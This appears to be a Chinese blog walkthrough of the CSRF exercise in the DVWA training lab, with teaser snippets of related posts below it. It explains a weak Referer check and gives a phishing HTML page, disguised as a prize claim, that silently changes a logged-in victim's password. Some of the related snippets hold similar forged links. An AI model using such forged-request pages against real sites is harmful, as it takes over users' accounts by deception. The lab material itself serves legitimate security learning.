DVWA-CSRF跨站请求伪造 Medium和Low级别

最新推荐文章于 2025-06-30 08:40:45 发布
最新推荐文章于 2025-06-30 08:40:45 发布
阅读量402 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: Kali 渗透 Web 安全 文章标签: csrf 前端 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xmj818719/article/details/123163601

1代码分析

 

过滤条件

if( stripos( $SERVER[ 'HTTP_REFERER' ] ,$SERVER[ 'SERVER_NAME' ]) !== false )

判断,$SERVER[ 'SERVER_NAME' ]在 $SERVER[ 'HTTP_REFERER' ] 中是否存在,寻找第一次出现的地址

$_SERVER[ ' SERVER_NAME' ] 网站的地址 192.168.0.9

$_SERVER[ 'HTTP_REFERER' ] 请求发起着地址 192.168.0.9(靶场地址)若从黑客构造的钓鱼网站跳转的,显示的是黑客攻击机的地址

2正常构造一个CSRF

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>恭喜你,获得100万大奖,点击领取....</title>
</head>
<body>
<a href='http://192.168.0.9/DVWA-master/vulnerabilities/csrf/? 
password_new=123456&password_conf=123456&Change=Change'>点击领取百万大奖</a>
</body>
</html>

WIN10-浏览器访问

最低0.47元/天 解锁文章

200万优质内容无限畅学
DVWA系列---CSRF(Cross Site Request Forgery)跨站请求伪造
野原新之助
01-26 746
文章目录一、前言CSRF二、Low级别1、演示2、源码三、Medium级别1、演示2、源码四、High级别1、演示 一、前言 CSRF CSRF(Cross Site Request Forgery)名为“跨站请求伪造”,意思是黑客伪装成用户的身份,利用目标服务器对用户的信任(即用户已经登入,且存有Cookie)进行数据请求或数据更改,达到攻击的目的。 CSRF形成的原因: 1、用户在登陆了网站后...
DVWA练习之CSRF
dz919908651的博客
08-22 2607
DVWA练习之CSRF 本博客将记录在web安全问题中一种常见的漏洞——“CSRF”漏洞的实践演练。首先阐述CSRF漏洞的概念,原理,最后展示基于DVWA的各种等级的CSRFCSRF概念 CSRF(cross-site request forgery):跨站请求伪造漏洞。 概念:利用用户已登录的身份,在用户毫不知情的情况下,以用户的名义完成非法操作。 DVWA跨站请求...
CSRF跨站请求伪造
Z_l123的博客
03-02 260
原理 一个CSRF漏洞攻击的实现,其需要由“三个部分”来构成 1、有一个漏洞存在(无需验证、任意修改后台数据、新增请求); 2、伪装数据操作请求的恶意链接或者页面; 3、诱使用户主动访问或登录恶意链接,触发非法操作; 1.DVWA-CSRF low 登录dvwa靶场,调节安全级别low,进入csrf模块 输入新密码,并进行抓包 构造恶意链接,让用户处于登录状态,去访问恶意url(发现修改成功) 可以使用img标签进行,编写1.html,使其访问 重新尝试登录,...
DVWA靶场通关笔记-CSRF(Medium级别)
最新发布
mooyuan的网络安全博客
06-30 954
本系列为通过《DVWA靶场通关笔记》的CSRF关卡(lowmedium,high,impossible共4关)渗透集合,通过对相应关卡源码的代码审计找到讲解渗透原理并进行渗透实践,本文为跨站请求伪造CSRF medium关卡的渗透部分。
DVWA系列】三、CSRF 跨站请求伪造(源码分析&漏洞利用
Pluto.的博客
03-12 667
文章目录DVWACSRF 跨站请求伪造一、low 级别二、medium 级别三、high 级别 DVWA CSRF 跨站请求伪造 一、low 级别 无安全防护措施,是判断两次输入的密码是否相同 随便修改一下,观察到修改密码值提交到了url中(get型): password_new=1&password_conf=1&Change=Change# 伪造一个网页,插入URL请求语句,修改密码为666,将它“修饰”一下: <html> <head> <t
DVWA [CSRF] 跨站请求伪造
weixin_45253622的博客
09-02 5128
CSRF 漏洞原理:攻击者在受害者未登出Web应用的情况下,诱导其击恶意链接,达到以用户身份完成恶意攻击。简单来说,就是攻击者以用户的身份完成操作达到各种目的。 Low 源代码: <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the pas
DVWACSRF跨站请求伪造实战
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
11-25 942
不为圣贤,便为禽兽;莫问收获,但问耕耘。
DVWA简介及靶场实战-CSRF跨站请求伪造
mmxhappy的专栏
01-23 2583
CSRF攻击的本质是重要操作的所有参数,都可以被攻击者猜测到,所以token值是必须的。观察以下源码,这里是添加了Anti-CSRF token机制,用户每次到改密页面的时候,服务器会返回一个随机token,向服务器发起请求需要提交token参数,而在服务器收到请求的时候,会优先检查token,只有token正确才会处理客户端请求。本质上,这样的逻辑代码设计本身就不合理,HTTP协议设计的初衷中,GET型请求就需要保证“幂等性”,即无论发出了多少次GET请求仅发出一次请求所产生的效果应该是相同的。
DVWA靶场-CSRF跨站请求伪造
mlws1900的博客
03-15 1736
CSRF(Cross—site request forgery),跨站请求伪造,是指利用受害者未失效的身份认证信息(cookie,会话等),诱骗其击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下,以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账,改密等)。设置了token限制,它是在每次访问此页面时,会随机生成一个token,当发起服务器请求时服务器会检查它的值。执行恶意操作,如修改密码,购买商品,转账等(盗用受害者身份,受害者能做什么攻击者就能以受害者身份)
DVWA靶场通关----(三)CSRF
m0_74977101的博客
02-04 904
攻击者诱骗用户浏览器向目标网站发送一个“伪造请求”(如转账、修改密码),利用用户已登录的会话权限完成恶意操作。
DVWACSRF攻击Low&medium&High)
liweibin812的博客
01-14 5474
CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRFXSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。在20...
DVWA实战篇-CSRF跨站请求伪造
weixin_58660073的博客
06-27 1018
Cross Site Request Forgery (CSRF) CSRF漏洞介绍 CSRF跨站请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性,你可以这样来理解: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、虚拟货币转账等。 如下:其中Web A为存在CSRF漏洞的网站,W...
DVWA CSRF:Cross-site request forgery(跨站请求伪造)全等级
柠檬i的博客
12-19 881
目录:三、CSRF:Cross-site request forgery(跨站请求伪造)1.Low2.Medium3.High4.Impossible 三、CSRF:Cross-site request forgery(跨站请求伪造) 本章使用的浏览器是Firefox63,由于浏览器版本不同,复现结果可能不同 1.Low 这是一个修改用户密码的界面,查看url可以发现,修改新密码直接通过url传参给服务器 192.168.171.10/vulnerabilities/csrf/?password_new=
DVWA-CSRF级别教程
weixin_44716769的博客
09-08 3902
CSRF Low等级 查看源码 服务器收到修改密码的请求后,会检查参数password_newpassword_conf是否相同,如果相同,就会修改密码,并没有任何的防CSRF机制(当然服务器对请求的发送者是做了身份验证的,是检查的cookie,只是这里的代码没有体现)。 构造链接 http://192.168.0.103/vulnerabilities/csrf/?password_new=zuowenyang&password_conf=zuowenyang&Change=Chang
DVWA - CSRF (low, medium, high)
无节操
01-06 3646
low设置一下cookie的PHPSESSIDsecurity即可跨站请求import requestsdef main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php' headers = { 'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngk
新手指南:DVWA级别教程之CSRF
g695144224的博客
08-09 2966
转自:http://www.freebuf.com/articles/web/118352.html DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分别是Brute
DVWACSRF全部等级解析
Reset
06-15 1808
目录 0x00 介绍 0x01 low级别 0x02 mediu级别 0x03 high级别 0x04 impossible级别 0x00 介绍 DVWA中有很多账号,这些密码都是md5加密的,解密一下就可以了。因为涉及到两个账号,所以需要了解。 0x01 low级别 先更改一个账户的密码,然后抓包看一下: 可以看到提交的新密码确认密码都在url的参数中,用的GET方法,有referer的验证。但是这里referer的验证并没有什么用。所以直接构造攻击链接: http://
【工具-DVWADVWA渗透系列三:CSRF
qqchaozai的专栏
10-21 2524
前言 DVWA安装使用介绍,见:【工具-DVWADVWA的安装使用 本渗透系列包含最新DVWA的14个渗透测试样例: 1.Brute Force(暴力破解)2.Command Injection(命令注入)3.CSRF(跨站请求伪造)4.File Inclusion(文件包含)5.File Uploa...
DVWACSRF跨站请求伪造
Cwillchris的博客
10-28 840
实验环境DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 一、Low级 1、源码分析 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input //获取两个输入框的密码 $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf'.
代码审计——DVWA CSRF跨站请求伪造
z1756227332的博客
03-06 466
LOW等级代码 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值